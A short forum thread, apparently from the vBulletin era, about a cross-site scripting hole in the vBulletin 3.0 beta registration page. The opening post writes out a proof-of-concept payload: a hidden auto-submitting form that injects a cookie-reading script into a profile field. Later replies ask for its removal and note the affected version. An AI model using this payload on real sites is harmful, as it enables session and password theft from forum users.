Registered: Dec 2003 Location: w00t Posts: 36 Status: Offline
an attacket can inject html with this: [form action="http://[victim]/register.php?do=register" method="post" style="display:none"] [input type="hidden" name="s" value="" /] [input type="hidden" name="regtype" value="1" /] [input type="text" class="bginput" name="field1" value="" size="25" maxlength="250" /] [input type="hidden" name="url" value="index.php" /] [input type="hidden" name="do" value="addmember" /] [/form] [script] //Code that will be executed var xss = "\"][script]alert(document"+".cookie)[\/script]"; document.forms[0].field1.value=xss; document.forms[0].submit(); [/script] *Replace ([],<> ) be careful
__________________
Report this post to a moderator | IP: Logged
Registered: Nov 2002 Location: In your hard drive Posts: 1921 Status: Offline
remove this please before people get ideas
quote:Originally posted by kryogenix remove this please before people get ideas no, i don't mean it that way, i'm just saying, it's possible so watch out, people can steal your password like that romeo guy in random thoughts
quote:Originally posted by kryogenix remove this please before people get ideas
Registered: Jun 2002 Location: land of the free Posts: 827 Status: Offline
this is for vB 3.0 beta, anyway
Registered: Mar 2002 Location: Posts: 1486 Status: Offline
xss injection vulnerabilities has been addressed since vb2.2.9..